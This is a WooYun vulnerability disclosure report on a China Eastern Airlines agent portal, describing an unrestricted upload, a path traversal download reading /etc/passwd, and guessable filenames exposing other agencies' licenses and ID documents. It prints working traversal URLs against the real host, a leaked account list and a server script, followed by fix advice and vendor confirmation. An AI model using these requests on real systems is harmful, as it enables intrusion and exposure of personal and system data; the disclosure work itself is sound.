当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0172998

漏洞标题:东航某处任意文件遍历并且查看其它用户资质(营业执照\法人身份证\税务登记证\ 中航协资格认可证书)

相关厂商:中国东方航空股份有限公司

漏洞作者: Fencing

提交时间:2016-01-27 12:15

修复时间:2016-03-10 16:42

公开时间:2016-03-10 16:42

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-27: 细节已通知厂商并且等待厂商处理中
2016-01-27: 厂商已经确认,细节仅向厂商公开
2016-02-06: 细节向核心白帽子及相关领域专家公开
2016-02-16: 细节向普通白帽子公开
2016-02-26: 细节向实习白帽子公开
2016-03-10: 细节向公众公开

简要描述:

东航叔叔修漏洞啦,任意文件下载,并且还能看其他人的资质哦~~

详细说明:

http://ceagent.ceair.com
注册

1.png


此处可以上传任意类型的文件。

3.png


2.png


Burp抓包改后缀,上传成功,但是由于使用的post参数下载文件,文件不能被解析,只能静静的躺在服务器上了。
但是发现此处post可以改成get,而且这个get请求使用的是系统目录格式,果断猜能任意文件下载,果然成功。

http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/opt/appdata/file/ceagent/front/agency/license_201601261734
11.php


http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/opt/appdata/file/ceagent/front/agency/../../../../../../../etc/passwd


HTTP/1.1 200 OK
Date: Tue, 26 Jan 2016 10:01:49 GMT
Server: Apache
ETag: 1231047008
Content-Disposition: attachment;filename="passwd"
Connection: close
Content-Type: text/plain
Content-Language: zh-UTF-8
Content-Length: 2686
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:100:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
hw:x:500:500:hw:/home/hw:/bin/bash
was7:x:3011:301::/home/was7:/bin/bash
rduser:x:2011:201::/home/rduser:/bin/bash
itimadmin:x:11014:11014::/home/itimadmin:/bin/bash
administrator:x:11016:11016::/home/administrator:/bin/bash
etdftp:x:11017:11017::/home/etdftp:/bin/bash
ora11g:x:11018:11018::/home/ora11g:/bin/bash
yxuser:x:11019:11019::/home/yxuser:/bin/bash
wang_yl:x:10001:400::/home/wang_yl:/bin/bash
zyjin:x:10002:400::/home/zyjin:/bin/bash
zhoujie:x:10003:400::/home/zhoujie:/bin/bash
apwang:x:10004:400::/home/apwang:/bin/bash
yaohy:x:10005:400::/home/yaohy:/bin/bash
huangqin:x:10006:400::/home/huangqin:/bin/bash
yongzhou:x:10007:400::/home/yongzhou:/bin/bash
yxhuang:x:10008:400::/home/yxhuang:/bin/bash
wtliu:x:10009:400::/home/wtliu:/bin/bash
zytao:x:10010:400::/home/zytao:/bin/bash
cjchen:x:10012:400::/home/cjchen:/bin/bash
jjjin:x:10013:400::/home/jjjin:/bin/bash
huanglei1:x:10014:400::/home/huanglei1:/bin/bash
zhangjinliang:x:10015:400::/home/zhangjinliang:/bin/bash
yuegao:x:10016:400::/home/yuegao:/bin/bash
observer:x:2013:201::/home/observer:/bin/bash
rdsys:x:2015:201::/home/rdsys:/bin/bash


HTTP/1.1 200 OK
Date: Tue, 26 Jan 2016 10:01:53 GMT
Server: Apache
ETag: 1758226636
Content-Disposition: attachment;filename="httpd"
Connection: close
Content-Type: text/plain
Content-Language: zh-UTF-8
Content-Length: 3200
#!/bin/bash
#
# httpd Startup script for the Apache HTTP Server
#
# chkconfig: - 85 15
# description: Apache is a World Wide Web server. It is used to serve \
# HTML files and CGI.
# processname: httpd
# config: /etc/httpd/conf/httpd.conf
# config: /etc/sysconfig/httpd
# pidfile: /var/run/httpd.pid
# Source function library.
. /etc/rc.d/init.d/functions
if [ -f /etc/sysconfig/httpd ]; then
. /etc/sysconfig/httpd
fi
# Start httpd in the C locale by default.
HTTPD_LANG=${HTTPD_LANG-"C"}
# This will prevent initlog from swallowing up a pass-phrase prompt if
# mod_ssl needs a pass-phrase from the user.
INITLOG_ARGS=""
# Set HTTPD=/usr/sbin/httpd.worker in /etc/sysconfig/httpd to use a server
# with the thread-based "worker" MPM; BE WARNED that some modules may not
# work correctly with a thread-based MPM; notably PHP will refuse to start.
# Path to the apachectl script, server binary, and short-form for messages.
apachectl=/usr/sbin/apachectl
httpd=${HTTPD-/usr/sbin/httpd}
prog=httpd
pidfile=${PIDFILE-/var/run/httpd.pid}
lockfile=${LOCKFILE-/var/lock/subsys/httpd}
RETVAL=0
# check for 1.3 configuration
check13 () {
CONFFILE=/etc/httpd/conf/httpd.conf
GONE="(ServerType|BindAddress|Port|AddModule|ClearModuleList|"
GONE="${GONE}AgentLog|RefererLog|RefererIgnore|FancyIndexing|"
GONE="${GONE}AccessConfig|ResourceConfig)"
if LANG=C grep -Eiq "^[[:space:]]*($GONE)" $CONFFILE; then
echo
echo 1>&2 " Apache 1.3 configuration directives found"
echo 1>&2 " please read /usr/share/doc/httpd-2.2.3/migration.html"
failure "Apache 1.3 config directives test"
echo
exit 1
fi
}
# The semantics of these two functions differ from the way apachectl does
# things -- attempting to start while running is a failure, and shutdown
# when not running is also a failure. So we just do it the way init scripts
# are expected to behave here.
start() {
echo -n $"Starting $prog: "
check13 || exit 1
LANG=$HTTPD_LANG daemon $httpd $OPTIONS
RETVAL=$?
echo
[ $RETVAL = 0 ] && touch ${lockfile}
return $RETVAL
}
# When stopping httpd a delay of >10 second is required before SIGKILLing the
# httpd parent; this gives enough time for the httpd parent to SIGKILL any
# errant children.
stop() {
echo -n $"Stopping $prog: "
killproc -d 10 $httpd
RETVAL=$?
echo
[ $RETVAL = 0 ] && rm -f ${lockfile} ${pidfile}
}
reload() {
echo -n $"Reloading $prog: "
if ! LANG=$HTTPD_LANG $httpd $OPTIONS -t >&/dev/null; then
RETVAL=$?
echo $"not reloading due to configuration syntax error"
failure $"not reloading $httpd due to configuration syntax error"
else
killproc $httpd -HUP
RETVAL=$?
fi
echo
}
# See how we were called.
case "$1" in
start)
start
;;
stop)
stop
;;
status)
status $httpd
RETVAL=$?
;;
restart)
stop
start
;;
condrestart)
if [ -f ${pidfile} ] ; then
stop
start
fi
;;
reload)
reload
;;
graceful|help|configtest|fullstatus)
$apachectl $@
RETVAL=$?
;;
*)
echo $"Usage: $prog {start|stop|restart|condrestart|reload|status|fullstatus|graceful|help|configtest}"
exit 1
esac
exit $RETVAL


第二个!!!
还没完,上面只是个任意文件下载,但是还没找到方法去getshell,不过看文件名

license_20160126173411.php


文件名是用时间构造的,可以任意下载其他用户的资质信息。
这个站点应该用的人不多,就不花时间爆破了,建议修复了吧,不然BURP爆破还是能曝出来其他人的
营业执照:
法人身份证:
税务登记证:
中航协资格认可证书:

4.png

漏洞证明:

修复方案:

1 文件上传要校验Content-type不要只在前端校验后缀
2 任意文件下载那个要处理一下,限制访问目录,或者过滤,或者限制访问方式。
3 其他人的资质用cookie去保护好,加权限控制,或者把文件名加个token,不要让文件名被按规律猜解

版权声明:转载请注明来源 Fencing@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-01-27 12:23

厂商回复:

十分感谢!

最新状态:

暂无